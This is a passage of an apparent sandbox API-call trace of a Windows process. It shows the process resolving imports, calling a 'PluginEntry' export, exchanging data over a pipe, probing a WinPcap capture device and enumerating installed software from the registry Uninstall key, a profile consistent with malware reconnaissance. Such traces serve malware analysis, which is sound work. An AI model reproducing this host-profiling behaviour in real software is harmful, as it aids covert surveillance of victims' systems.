0x76f922b0 [0047.330] GetProcAddress (hModule=0x76600000, lpProcName="LeaveCriticalSection") returned 0x76f92270 [0047.330] GetProcAddress (hModule=0x76600000, lpProcName="ReadFile") returned 0x76613ed3 [0047.330] GetProcAddress (hModule=0x76600000, lpProcName="CreateEventW") returned 0x7661183e [0047.331] GetProcAddress (hModule=0x76600000, lpProcName="WaitForSingleObject") returned 0x76611136 [0047.331] GetProcAddress (hModule=0x76600000, lpProcName="InitializeCriticalSection") returned 0x76fa2c42 [0047.331] GetProcAddress (hModule=0x76600000, lpProcName="SetEvent") returned 0x766116c5 [0047.331] GetProcAddress (hModule=0x76600000, lpProcName="HeapAlloc") returned 0x76f9e026 [0047.331] GetProcAddress (hModule=0x76600000, lpProcName="HeapFree") returned 0x766114c9 [0047.331] GetProcAddress (hModule=0x76600000, lpProcName="GetProcessHeap") returned 0x766114e9 [0047.331] GetProcAddress (hModule=0x76600000, lpProcName="UnhandledExceptionFilter") returned 0x7663772f [0047.332] GetProcAddress (hModule=0x76600000, lpProcName="TerminateProcess") returned 0x7662d802 [0047.332] GetProcAddress (hModule=0x76600000, lpProcName="GetFileSize") returned 0x7661196e [0047.332] GetProcAddress (hModule=0x76600000, lpProcName="WriteFile") returned 0x76611282 [0047.332] GetProcAddress (hModule=0x76600000, lpProcName="CreateFileW") returned 0x76613f5c [0047.332] GetProcAddress (hModule=0x76600000, lpProcName="GetTickCount") returned 0x7661110c [0047.332] GetProcAddress (hModule=0x76600000, lpProcName="QueryPerformanceCounter") returned 0x76611725 [0047.332] GetProcAddress (hModule=0x76600000, lpProcName="GetSystemTimeAsFileTime") returned 0x76613509 [0047.333] GetProcAddress (hModule=0x76600000, lpProcName="SystemTimeToFileTime") returned 0x76615a7e [0047.333] GetProcAddress (hModule=0x76600000, lpProcName="OutputDebugStringA") returned 0x7663b2b7 [0047.333] GetProcAddress (hModule=0x76600000, lpProcName="GetLastError") returned 0x766111c0 [0047.333] GetProcAddress (hModule=0x76600000, lpProcName="CloseHandle") returned 0x76611410 [0047.333] GetProcAddress (hModule=0x76600000, lpProcName="DeleteCriticalSection") returned 0x76fa45f5 [0047.333] GetProcAddress (hModule=0x76600000, lpProcName="CreateFileA") returned 0x766153c6 [0047.333] GetProcAddress (hModule=0x76600000, lpProcName="RtlUnwind") returned 0x7663d1c3 [0047.334] GetProcAddress (hModule=0x76600000, lpProcName="SetUnhandledExceptionFilter") returned 0x766187c9 [0047.334] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76710000 [0047.334] GetProcAddress (hModule=0x76710000, lpProcName="CoCreateGuid") returned 0x767515d5 [0047.334] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74ea0000 [0047.334] GetProcAddress (hModule=0x74ea0000, lpProcName="CheckTokenMembership") returned 0x74eadf04 [0047.334] GetProcAddress (hModule=0x74ea0000, lpProcName="AllocateAndInitializeSid") returned 0x74eb40e6 [0047.334] GetProcAddress (hModule=0x74ea0000, lpProcName="GetSidSubAuthority") returned 0x74eb0e24 [0047.335] GetProcAddress (hModule=0x74ea0000, lpProcName="GetSidSubAuthorityCount") returned 0x74eb0e0c [0047.335] GetProcAddress (hModule=0x74ea0000, lpProcName="GetTokenInformation") returned 0x74eb431c [0047.335] GetProcAddress (hModule=0x74ea0000, lpProcName="OpenProcessToken") returned 0x74eb4304 [0047.335] GetProcAddress (hModule=0x74ea0000, lpProcName="RegQueryValueExW") returned 0x74eb46ad [0047.335] GetProcAddress (hModule=0x74ea0000, lpProcName="RegCloseKey") returned 0x74eb469d [0047.335] GetProcAddress (hModule=0x74ea0000, lpProcName="RegEnumKeyExA") returned 0x74eb1481 [0047.335] GetProcAddress (hModule=0x74ea0000, lpProcName="RegOpenKeyExA") returned 0x74eb4907 [0047.335] GetProcAddress (hModule=0x74ea0000, lpProcName="FreeSid") returned 0x74eb412e [0047.336] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x76f70000 [0047.336] GetProcAddress (hModule=0x76f70000, lpProcName="RtlRandom") returned 0x770398c3 [0047.336] GetProcAddress (hModule=0x76f70000, lpProcName="ZwQueryObject") returned 0x76f8f9e8 [0047.336] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x76a40000 [0047.336] GetProcAddress (hModule=0x76a40000, lpProcName="??3@YAXPAX@Z") returned 0x76a4b0b9 [0047.336] GetProcAddress (hModule=0x76a40000, lpProcName="memset") returned 0x76a49790 [0047.336] GetProcAddress (hModule=0x76a40000, lpProcName="malloc") returned 0x76a49cee [0047.337] GetProcAddress (hModule=0x76a40000, lpProcName="free") returned 0x76a49894 [0047.337] GetProcAddress (hModule=0x76a40000, lpProcName="strlen") returned 0x76a543d3 [0047.337] GetProcAddress (hModule=0x76a40000, lpProcName="memcmp") returned 0x76a57975 [0047.337] GetProcAddress (hModule=0x76a40000, lpProcName="puts") returned 0x76ab8d04 [0047.337] GetProcAddress (hModule=0x76a40000, lpProcName="abort") returned 0x76aa8e53 [0047.338] GetProcAddress (hModule=0x76a40000, lpProcName="memcpy") returned 0x76a49910 [0047.338] GetProcAddress (hModule=0x76a40000, lpProcName="memmove") returned 0x76a49e5a [0047.338] GetProcAddress (hModule=0x76a40000, lpProcName="vsprintf") returned 0x76ab7677 [0047.338] GetProcAddress (hModule=0x76a40000, lpProcName="realloc") returned 0x76a4b10d [0047.338] GetProcAddress (hModule=0x76a40000, lpProcName="wcslen") returned 0x76a5d335 [0047.338] GetProcAddress (hModule=0x76a40000, lpProcName="exit") returned 0x76a536aa [0047.339] GetProcAddress (hModule=0x76a40000, lpProcName="_snprintf") returned 0x76a6fa7c [0047.339] GetProcAddress (hModule=0x76a40000, lpProcName="_vsnprintf") returned 0x76a4d1a8 [0047.339] GetProcAddress (hModule=0x76a40000, lpProcName="strchr") returned 0x76a4dbeb [0047.339] GetProcAddress (hModule=0x76a40000, lpProcName="??2@YAPAXI@Z") returned 0x76a4b0c9 [0047.339] _strcmpi (_Str1="PluginEntry", _Str2="PluginEntry") returned 0 [0047.339] SetEvent (hEvent=0x244) returned 1 [0047.339] GetCurrentThreadId () returned 0xad8 [0047.339] ReadFile (in: hFile=0x260, lpBuffer=0x26426cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x2642668 | out: lpBuffer=0x26426cc, lpNumberOfBytesRead=0x0, lpOverlapped=0x2642668) returned 0 [0047.339] GetLastError () returned 0x3e5 [0047.339] GetQueuedCompletionStatus (in: CompletionPort=0x268, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0047.340] GetCurrentThreadId () returned 0xad8 [0047.340] WriteFile (in: hFile=0x260, lpBuffer=0x2605908, nNumberOfBytesToWrite=0xc, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2642688 | out: lpBuffer=0x2605908, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2642688) returned 1 [0047.341] SetEvent (hEvent=0x274) returned 1 [0047.341] GetQueuedCompletionStatus (in: CompletionPort=0x268, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0047.341] SetEvent (hEvent=0x244) returned 1 [0047.342] GetCurrentThreadId () returned 0xad8 [0047.342] ReadFile (in: hFile=0x260, lpBuffer=0x26426cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x2642668 | out: lpBuffer=0x26426cc, lpNumberOfBytesRead=0x0, lpOverlapped=0x2642668) returned 0 [0047.342] GetLastError () returned 0x3e5 [0047.342] GetQueuedCompletionStatus (in: CompletionPort=0x268, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0047.342] GetQueuedCompletionStatus (in: CompletionPort=0x268, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0047.591] GetCurrentThreadId () returned 0xad8 [0047.591] SetEvent (hEvent=0x244) returned 1 [0047.591] GetCurrentThreadId () returned 0xad8 [0047.591] ReadFile (in: hFile=0x260, lpBuffer=0x26426cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x2642668 | out: lpBuffer=0x26426cc, lpNumberOfBytesRead=0x0, lpOverlapped=0x2642668) returned 0 [0047.591] GetLastError () returned 0x3e5 [0047.591] GetQueuedCompletionStatus (in: CompletionPort=0x268, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0047.640] GetCurrentThreadId () returned 0xad8 [0047.640] WriteFile (in: hFile=0x260, lpBuffer=0x26328c0, nNumberOfBytesToWrite=0xf54, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2642688 | out: lpBuffer=0x26328c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2642688) returned 1 [0047.642] SetEvent (hEvent=0x2b8) returned 1 [0047.642] GetQueuedCompletionStatus (in: CompletionPort=0x268, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0047.642] SetEvent (hEvent=0x2b0) returned 1 [0047.642] GetCurrentThreadId () returned 0xad8 [0047.642] ReadFile (in: hFile=0x260, lpBuffer=0x26426cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x2642668 | out: lpBuffer=0x26426cc, lpNumberOfBytesRead=0x0, lpOverlapped=0x2642668) returned 0 [0047.642] GetLastError () returned 0x3e5 [0047.642] GetQueuedCompletionStatus (in: CompletionPort=0x268, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0047.642] GetQueuedCompletionStatus (in: CompletionPort=0x268, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0047.878] SetEvent (hEvent=0x244) returned 1 [0047.878] GetCurrentThreadId () returned 0xad8 [0047.878] ReadFile (in: hFile=0x260, lpBuffer=0x26426cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x2642668 | out: lpBuffer=0x26426cc, lpNumberOfBytesRead=0x0, lpOverlapped=0x2642668) returned 0 [0047.878] GetLastError () returned 0x3e5 [0047.878] GetQueuedCompletionStatus (in: CompletionPort=0x268, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0047.878] GetCurrentThreadId () returned 0xad8 [0047.878] WriteFile (in: hFile=0x260, lpBuffer=0x2faa8, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2642688 | out: lpBuffer=0x2faa8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2642688) returned 1 [0047.878] SetEvent (hEvent=0x2b8) returned 1 [0047.879] GetQueuedCompletionStatus (in: CompletionPort=0x268, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0047.879] GetQueuedCompletionStatus (in: CompletionPort=0x268, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 0 [0047.880] GetLastError () returned 0x6d [0047.880] CancelIo (hFile=0x260) returned 1 [0047.880] CloseHandle (hObject=0x260) returned 1 [0047.880] SetEvent (hEvent=0x24c) returned 1 [0047.880] SetEvent (hEvent=0x244) returned 1 [0047.880] GetCurrentThreadId () returned 0xad8 [0047.880] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0047.881] CloseHandle (hObject=0x24c) returned 1 [0047.881] CloseHandle (hObject=0x244) returned 1 [0047.881] CloseHandle (hObject=0x278) returned 1 [0047.881] GetCurrentThreadId () returned 0xad8 [0047.881] GetCurrentThreadId () returned 0xad8 [0047.881] VirtualFree (lpAddress=0x1c90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0047.883] GetCurrentThreadId () returned 0xad8 [0047.883] CloseHandle (hObject=0x268) returned 1 [0047.883] CloseHandle (hObject=0x270) returned 1 [0047.883] RtlExitUserThread (Status=0x0) Thread: id = 44 os_tid = 0xadc [0047.339] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0047.339] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0047.340] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0047.340] GetCurrentThreadId () returned 0xadc [0047.340] GetCurrentThreadId () returned 0xadc [0047.340] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x274 [0047.340] PostQueuedCompletionStatus (CompletionPort=0x268, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2620c7c) returned 1 [0047.340] WaitForSingleObject (hHandle=0x274, dwMilliseconds=0x7530) returned 0x0 [0047.341] CloseHandle (hObject=0x274) returned 1 [0047.341] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0047.341] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0047.341] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0047.341] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0047.342] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0047.342] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0047.342] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0047.591] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0047.591] GetCurrentThreadId () returned 0xadc [0047.595] CreateFileA (lpFileName="\\\\.\\NPF_NdisWanIp" (normalized: "npf_ndiswanip"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0047.595] GetLastError () returned 0x2 [0047.595] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe78 | out: phkResult=0x59ffe78*=0x2b0) returned 0x0 [0047.595] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x0, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AddressBook", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.595] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="AddressBook", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.595] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.595] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.595] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x1, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Adobe Flash Player Plugin", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.595] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="Adobe Flash Player Plugin", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.595] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x3a) returned 0x0 [0047.595] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x261fd60, lpcbData=0x59ffd3c*=0x3a | out: lpType=0x0, lpData=0x261fd60*=0x41, lpcbData=0x59ffd3c*=0x3a) returned 0x0 [0047.595] wcslen (_String="Adobe Flash Player 10 Plugin") returned 0x1c [0047.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Adobe Flash Player 10 Plugin", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0047.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Adobe Flash Player 10 Plugin", cchWideChar=28, lpMultiByteStr=0x2600510, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Adobe Flash Player 10 Plugin", lpUsedDefaultChar=0x0) returned 28 [0047.596] strlen (_Str="Adobe Flash Player Plugin") returned 0x19 [0047.596] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.596] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x2, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Connection Manager", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.596] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="Connection Manager", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.596] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.596] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.596] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x3, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="DirectDrawEx", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.596] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="DirectDrawEx", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.596] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.596] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.596] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x4, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Fontcore", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.596] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="Fontcore", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.596] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.596] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.596] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x5, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Google Chrome", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.596] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="Google Chrome", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.596] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x1c) returned 0x0 [0047.596] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2600650, lpcbData=0x59ffd3c*=0x1c | out: lpType=0x0, lpData=0x2600650*=0x47, lpcbData=0x59ffd3c*=0x1c) returned 0x0 [0047.596] wcslen (_String="Google Chrome") returned 0xd [0047.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Google Chrome", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0047.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Google Chrome", cchWideChar=13, lpMultiByteStr=0x262b194, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Google Chrome", lpUsedDefaultChar=0x0) returned 13 [0047.596] strlen (_Str="Google Chrome") returned 0xd [0047.596] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.597] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x6, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE40", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.597] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="IE40", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.597] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.597] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.597] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x7, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE4Data", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.597] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="IE4Data", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.597] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.597] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.597] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x8, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE5BAKEX", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.597] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="IE5BAKEX", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.597] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.597] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.597] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x9, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IEData", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.597] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="IEData", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.597] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.597] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.597] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0xa, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MobileOptionPack", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.597] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="MobileOptionPack", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.597] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.597] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.597] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0xb, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Mozilla Firefox 25.0 (x86 en-US)", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.598] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="Mozilla Firefox 25.0 (x86 en-US)", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.598] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x42) returned 0x0 [0047.598] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x26047a8, lpcbData=0x59ffd3c*=0x42 | out: lpType=0x0, lpData=0x26047a8*=0x4d, lpcbData=0x59ffd3c*=0x42) returned 0x0 [0047.598] wcslen (_String="Mozilla Firefox 25.0 (x86 en-US)") returned 0x20 [0047.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mozilla Firefox 25.0 (x86 en-US)", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, 